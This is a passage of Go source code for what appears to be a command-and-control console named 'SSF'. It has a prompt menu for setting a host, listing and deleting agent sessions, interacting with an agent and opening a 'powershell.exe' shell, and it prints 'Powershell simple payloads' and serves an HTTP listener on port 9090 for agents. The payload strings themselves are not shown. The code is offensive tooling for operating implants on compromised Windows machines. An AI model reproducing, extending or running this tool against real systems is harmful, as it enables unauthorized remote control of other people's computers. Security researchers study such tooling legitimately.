372 | fmt.Printf("%s %s \n", Blue("[*]"), "---+ Powershell simple payloads +---")
373 | fmt.Printf("%s %s \n", red("[+]"), simple_payload)
374 | fmt.Println("\n")
375 | fmt.Printf("%s %s \n", red("[+]"), simple_payload2)
376 | fmt.Println("\n")
377 | fmt.Printf("%s %s \n", red("[+]"), simple_payload3)
378 | fmt.Println("\n")
379 | }
380 |
381 | //---------------------------------------------------------------
382 |
383 | func Scanf(a *string) {
384 | reader := bufio.NewReader(os.Stdin)
385 | data, _, _ := reader.ReadLine()
386 | if string(data) == "info" {
387 | *a = ""
388 | info_os() // info信息
389 | return
390 | } else if string(data) == "help" {
391 | *a = ""
392 |
393 | fmt.Println(help_shell)
394 | return
395 | //帮助参数 help
396 | } else if string(data) == "back" {
397 | *a = ""
398 | back = "back"
399 | return
400 | }
401 | *a = string(data)
402 |
403 | }
404 |
405 | func clear() {
406 | if runtime.GOOS == "windows" {
407 | cmd := exec.Command("cmd", "/c", "cls")
408 | cmd.Stdout = os.Stdout
409 | cmd.Run()
410 | cmd.Start()
411 | } else {
412 | cmd := exec.Command("clear")
413 | cmd.Stdout = os.Stdout
414 | cmd.Run()
415 | cmd.Start()
416 | }
417 | //定义系统清屏clear()
418 | }
419 |
420 | func completer(in prompt.Document) []prompt.Suggest { //一级菜单栏列表 First-level menu bar list
421 | s := []prompt.Suggest{
422 | {Text: "help", Description: "Help menu"},
423 | {Text: "set Host", Description: "Setting IP address "},
424 | {Text: "session list", Description: "List os Info"},
425 | {Text: "Interact", Description: "Interact with AGENT"},
426 | {Text: "shell", Description: "shell => powershell.exe"},
427 | {Text: "exit", Description: "Exit the program"},
428 | {Text: "del", Description: "del session id"},
429 | }
430 | return prompt.FilterHasPrefix(s, in.GetWordBeforeCursor(), true)
431 | }
432 |
433 | func del_session(id string) {
434 | Blue := color.New(color.FgBlue).SprintFunc()
435 | Red := color.New(color.FgRed).SprintFunc()
436 | session_id = strings.Split(id, " ")[1]
437 | if len(strings.Split(id, " ")) > 1 {
438 | delete(AGENTS, session_id)
439 | fmt.Printf("%s del Session id=> %s.\n", Blue("[*]"), session_id)
440 | } else {
441 | fmt.Printf("%s could not find it id %s \n", Red("[*]"), session_id)
442 | }
443 | }
444 |
445 | func Session_id(id string) {
446 | Blue := color.New(color.FgBlue).SprintFunc()
447 | Red := color.New(color.FgRed).SprintFunc()
448 | if len(strings.Split(id, " ")) > 1 {
449 | session_id = strings.Split(id, " ")[1]
450 | fmt.Printf("%s setting Session id=> %s.\n", Blue("[*]"), session_id)
451 | } else {
452 | fmt.Printf("%s set Session id err \n", Red("[*]"))
453 | }
454 |
455 | }
456 |
457 | func Options() { //定义tab 下拉菜单选项参数
458 | for true {
459 | options := prompt.Input("SSF >", completer,
460 | prompt.OptionPrefixTextColor(prompt.Red), //字体颜色 font color
461 | prompt.OptionPreviewSuggestionTextColor(prompt.Black), //下拉菜单的字体 Font for drop-down menu
462 | prompt.OptionSelectedSuggestionBGColor(prompt.LightGray), //下拉菜单的字背景 Word background for drop down menu
463 | prompt.OptionSuggestionBGColor(prompt.DarkGray)) //菜单框背景 Menu box background
464 |
465 | if options == "shell" {
466 | for true {
467 | fmt.Print("Console_shell >")
468 | Scanf(&cmd)
469 | if back == "back" {
470 | back = ""
471 | break
472 | }
473 |
474 | }
475 | } else if options == "help" {
476 | fmt.Println(help)
477 | } else if strings.Contains(options, "Interact") {
478 | Session_id(options)
479 | } else if strings.Contains(options, "del") {
480 | del_session(options)
481 | } else if options == "session list" {
482 | info_os()
483 | } else if options == "exit" {
484 | os.Exit(0)
485 | break
486 | } else if options == "set Host" {
487 | Hosts()
488 | }
489 |
490 | }
491 |
492 | }
493 |
494 | func main() {
495 | AGENTS = make(map[string]string)
496 | http.HandleFunc("/", httpserver) //设置访问的路由 Set up access routes
497 |
498 | go http.ListenAndServe(":9090", nil) //设置监听的端口 Set the listening port
499 | clear() //系统清屏 system clear
500 | Options()
501 |
502 | }
503 |
--------------------------------------------------------------------------------